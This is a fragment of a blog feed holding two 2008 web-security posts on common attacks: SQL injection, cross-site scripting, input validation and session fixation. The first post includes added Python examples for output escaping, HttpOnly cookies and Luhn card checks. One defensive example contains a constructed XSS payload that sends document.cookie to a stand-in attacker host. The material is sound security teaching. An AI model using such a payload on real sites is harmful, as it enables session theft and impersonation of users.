width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-5354973529832883408</id><published>2008-02-03T23:26:00.000-08:00</published><updated>2008-02-03T23:34:26.560-08:00</updated><title type='text'>No More HACKING..no more</title><content type='html'>&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(51, 51, 255);font-size:130%;" &gt;Hacking hacking hack...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Here I am not going to teach you to hack, but I will give you some techniques to prevent hacking attacks. It is very difficult to be a hacker. The person who is going to be a hacker should have expert knowledge of at least one programming language and a creative mind. It is better to know the hacking types that hackers mostly use. These things I got from the internet; the accuracy may not be assured, but it will give enough of an idea.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;THESE ARE NOT MY INSPIRATION. THANKS TO EVERY ORIGINAL AUTHOR..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Without your articles, I cannot create this type of blog&lt;/span&gt;.&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="font-size:130%;"&gt;These are the top 10 web hacking techniques commonly used&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Unvalidated input&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Broken access control&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Broken authentication and session management&lt;/span&gt;&lt;br /&gt;&lt;span 
style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Cross site scripting&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Buffer overflows&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Injection flaws&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Improper error handling&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Insecure storage&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Denial of service&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:100%;" &gt;Insecure configuration management&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;Some of the above are explained in detail.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;INJECTION FLAWS (SQL INJECTION)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;SQL — Structured Query Language — is the language used by software engineers and web developers everywhere to interface web applications with databases. When a web developer uses data from a web form as part of a SQL statement without carefully validating it, there is a reasonable likelihood of a SQL Injection vulnerability.&lt;br /&gt;&lt;br /&gt;SQL Injection attacks typically only work against systems where server-side software is constructing strings to build dynamic SQL statements using parameters controlled by an end user. 
Many database-driven systems utilize stored procedures extensively; calling a stored procedure defeats these attacks only when its arguments are passed as bound parameters and the procedure does not itself assemble dynamic SQL from them. A procedure invoked through a concatenated string is as exploitable as any other query.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;CROSS SITE SCRIPTING&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Cross site scripting (abbreviated XSS; the older abbreviation CSS is avoided because it collides with Cascading Style Sheets) is one of the most common application level attacks that hackers use to sneak into web applications today. Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker and the web site, or the attacker and the victim client – the XSS attack involves three parties: the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies, or any other sensitive information which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, that is, impersonate the user. For example, in one audit conducted for a large company it was possible to peek at the user’s credit card number and private information using an XSS attack. This was achieved by running malicious JavaScript code in the victim (client) browser with the “access&lt;br /&gt;privileges” of the web site. These are the limited privileges the browser's same-origin policy grants a script: it may read only the data of the site that served it, such as that site's cookies and page content. Because the injected script is served by the vulnerable site, it inherits exactly those privileges for that site. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. 
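&lt;br /&gt;&lt;br /&gt;As an added example (not the post's own code), the following Python shows the cookie-theft scenario in miniature: a guestbook page that pastes stored comments straight into its HTML, the same page with html.escape applied on output, and the Set-Cookie line a server should send so that a script which does run cannot read the session cookie through document.cookie. The hostile comment, the attacker's hostname and the session value are all constructed here, and the less-than and greater-than characters in the code are written as \x3c and \x3e string escapes.&lt;br /&gt;&lt;br /&gt;

```python
# Added example (not the post's own code): a toy guestbook that renders
# comments into HTML, first unescaped and then with html.escape, plus the
# Set-Cookie value a server should send so injected script cannot read the
# session cookie. The payload is constructed; \x3c and \x3e are the
# less-than and greater-than characters written as string escapes.
import html
from http.cookies import SimpleCookie

# A comment a hostile visitor might leave: a script tag that ships the
# reader's cookies to a server the attacker controls (hostname is made up).
ATTACK_COMMENT = (
    "great site!\x3cscript\x3e"
    "new Image().src='http://attacker.invalid/?c='+document.cookie"
    "\x3c/script\x3e"
)


def render_unescaped(comments):
    """The guestbook as the post describes it: stored text pasted straight
    into the page, so any HTML in a comment becomes part of the page."""
    return "".join("\x3cp\x3e" + c + "\x3c/p\x3e" for c in comments)


def render_escaped(comments):
    """Same page, but every comment is HTML-escaped on output, so the
    browser shows the tag characters as text instead of executing them."""
    return "".join("\x3cp\x3e" + html.escape(c) + "\x3c/p\x3e" for c in comments)


def contains_script_tag(page):
    """True when the page carries a live script tag (what the attack needs)."""
    return "\x3cscript" in page.lower()


def session_cookie_header(session_id):
    """Set-Cookie value with HttpOnly, so document.cookie cannot read the
    session id even if script does run, and Secure, so it travels only over
    TLS. This limits the damage; it does not replace output escaping."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["path"] = "/"
    return cookie["SESSIONID"].OutputString()


if __name__ == "__main__":
    comments = ["nice colours", ATTACK_COMMENT]
    print(render_unescaped(comments))
    print(render_escaped(comments))
    print(session_cookie_header("abc123"))
```

Escaping at the point where untrusted text meets HTML is the fix for the vulnerability itself; the HttpOnly flag only limits what a successful injection can steal, and the Secure flag keeps the cookie off plaintext connections where it could be intercepted.&lt;br /&gt;&lt;br /&gt;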
The result: the attacker gains the cookies&lt;br /&gt;and impersonates the victim.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;INPUT VALIDATION&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Input validation attacks attempt to submit data which the application does not expect to receive. Normally, an application will perform some type of sanity check on user input. This check tries to ensure that the data is useful. Stricter checks are necessary to prevent the data from crashing the server, while less stringent checks are enough where the data only has to be limited to a specific length.&lt;br /&gt;&lt;br /&gt;Imagine the credit card field for an application’s shopping cart. First of all, the credit card number will only consist of digits. Furthermore, most credit card numbers are 16 digits long, but some brands use fewer. So, the first validation routine will be a length check. Does the input contain 14 to 16 characters? The second check will be for content. Does the input contain any character that is not a digit? We could add another check to the system that determines whether or not the data represents a reasonable credit card number. The value “0000111122223333” is definitely not a credit card number, but what about&lt;br /&gt;“4435786912639983”? A simple function, the Luhn mod-10 algorithm, can determine if a 16-character value satisfies the checksum required of valid credit card numbers. Publicly available routines can also determine the validity and card type of a 15-character credit card number that starts with a 3 and whose second digit is a 4 or a 7 (the American Express format).&lt;br /&gt;&lt;br /&gt;Data validation can be complex. The application programmers have to exercise a little prescience to figure out all of the possible values that a user might enter into a form field. We just mentioned three simple checks for credit card validation. These tests can be programmed in JavaScript, placed in the HTML page, and served over SSL. 
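&lt;br /&gt;&lt;br /&gt;Those three checks, implemented as an added example (not the post's code) in Python so that they run on the server rather than in the browser: a length check, a digits-only check and the Luhn mod-10 checksum, followed by a brand guess from the prefix. The prefix rules are a deliberately short subset (16-digit numbers starting with 4 as Visa, 51 to 55 as Mastercard, 15-digit numbers starting with 34 or 37 as American Express), and the numbers in demo() are the post's two values plus the widely published Visa and American Express test numbers, not real cards.&lt;br /&gt;&lt;br /&gt;

```python
# Added example (not the post's own code): the three checks the post
# describes (length, digits only, checksum) implemented server-side. The
# checksum is the Luhn mod-10 algorithm; the card-type rules are a short
# subset of the well-known prefixes and are not taken from the post. The
# numbers in demo() are the post's two values plus published test numbers.
import re

DIGITS_ONLY = re.compile(r"^[0-9]+$")


def luhn_ok(number):
    """Luhn check: from the right, double every second digit, add the digits
    of each product, and require the total to be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = sum(divmod(2 * d, 10))   # digit sum of 2*d, e.g. 16 becomes 7
        total += d
    return total % 10 == 0


def card_type(number):
    """Brand from prefix and length (partial rule set); None if no rule matches."""
    if len(number) == 15 and number[:2] in ("34", "37"):
        return "amex"
    if len(number) == 16 and number[0] == "4":
        return "visa"
    if len(number) == 16 and number[:2] in ("51", "52", "53", "54", "55"):
        return "mastercard"
    return None


def validate_card(raw):
    """Run the checks in the order the post gives them.

    Returns (True, brand) or (False, reason). Spaces and dashes are stripped
    first so that the length check sees only the number itself.
    """
    number = raw.replace(" ", "").replace("-", "")
    if len(number) not in range(14, 17):
        return False, "length"
    if not DIGITS_ONLY.match(number):
        return False, "non-digit"
    if not luhn_ok(number):
        return False, "checksum"
    return True, card_type(number) or "unknown"


def demo():
    """Constructed inputs: the post's two values, two published test numbers,
    a spaced form of one of them, and a value with a letter in it."""
    samples = [
        "0000111122223333",      # fails the checksum
        "4435786912639983",      # the post's question: also fails the checksum
        "4111111111111111",      # Visa test number, passes
        "378282246310005",       # American Express test number, passes
        "4111 1111 1111 1111",   # same Visa number with spaces
        "4111111111111a11",      # right length, wrong content
    ]
    return {s: validate_card(s) for s in samples}


if __name__ == "__main__":
    for number, verdict in demo().items():
        print(number, verdict)
```

The post's “4435786912639983” fails the checksum, so it never reaches the brand lookup. A copy of these checks in JavaScript can still be served for immediate feedback, but the server-side run is the one that counts.&lt;br /&gt;&lt;br /&gt;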
But is it secure? No: JavaScript runs in the user's browser, and a user (or an attacker acting as one) can disable it, edit the page, or send the request directly through an intercepting proxy, so every check must be repeated on the server, where the attacker cannot reach it. Client-side validation is a convenience for honest users, not a security control.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;SESSION HIJACKING&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Many web-based applications employ some kind of session management to create a user-friendly environment. Sessions are stored on the server and associated with&lt;br /&gt;their respective users by session identifiers (IDs). Naturally, session IDs present an&lt;br /&gt;attractive target for attackers, who, by obtaining them, effectively hijack users’&lt;br /&gt;identities. Knowing that, web servers employ techniques for protecting session IDs from three classes of attacks: interception, prediction and brute-force attacks. In a session fixation attack, the attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need to obtain the user’s session ID afterwards. There are many ways for the attacker to perform a session fixation attack, depending on the session ID transport mechanism (URL arguments, hidden form fields, cookies) and the vulnerabilities available in the target system or its immediate environment. The paper this section is drawn from provides detailed information about exploiting vulnerable systems as well as recommendations for protecting them against session fixation attacks; the essential one is that the server must issue a fresh session ID at login and refuse to adopt any ID it did not generate itself.&lt;br /&gt;&lt;br /&gt;So.. it's enough for today.. I think now you have a VERY LITTLE IDEA about what hackers do.&lt;br /&gt;Next time I'll tell you about other types of hackers' techniques and new trends..&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;SOMETIMES THIS BLOG WILL DISAPPEAR AFTER A FEW DAYS.. BECAUSE I PUBLISHED HACKERS' SECRETS&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;BUT REMEMBER THERE MUSTN'T BE ANY SECRETS.. WE HAVE TO SHARE OUR KNOWLEDGE FOR THE INTERNET TO&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;BECOME A BETTER PLACE FOR EVERYONE.. SO I'M WAITING FOR YOUR COMMENTS.. 
USE THIS BLOG TO&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;SHARE YOUR KNOWLEDGE.. THIS WILL HELP US KEEP OUR SITES SAFE.. AND ALSO HELP TO&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;IMPROVE OUR KNOWLEDGE..&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-5354973529832883408?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/5354973529832883408/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=5354973529832883408' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/5354973529832883408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/5354973529832883408'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/02/no-more-hackingno-more.html' title='No More HACKING..no more'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-4658990852507644851</id><published>2008-02-03T06:03:00.000-08:00</published><updated>2008-02-03T06:07:48.211-08:00</updated><title type='text'>Cross Site Scripting</title><content type='html'>&lt;span style="color: rgb(51, 102, 255);font-size:130%;" &gt;What is XSS?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;"XSS", or cross-site scripting, is an attack on other users. 
It won't give you 'root' or SYSTEM access on a web server. It lives purely at the application level (forget about the OSI model for just a minute), so it will get you some privileges or information within the web application. Nothing more, nothing less.&lt;br /&gt;&lt;br /&gt;Roughly speaking, XSS is the ability to inject HTML tags, and through them script, into the input of a web application. A "web application" can be many things, from a web-based e-mail client to online forums to e-shopping malls. The list is limited only by human creativity.&lt;br /&gt;&lt;br /&gt;To give a very basic example, imagine a guestbook where people can discuss what they think about that very website. When viewing the guestbook, a user sees whatever previous users said about this particular website, and sometimes HTML tags are even allowed. Why not put your text in a red 'comic sans' font, so that your message will be noticed?&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;&lt;br /&gt;This is dangerous.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-4658990852507644851?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/4658990852507644851/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=4658990852507644851' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/4658990852507644851'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/4658990852507644851'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/02/cross-site-scripting.html' title='Cross Site 
Scripting'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry></feed>
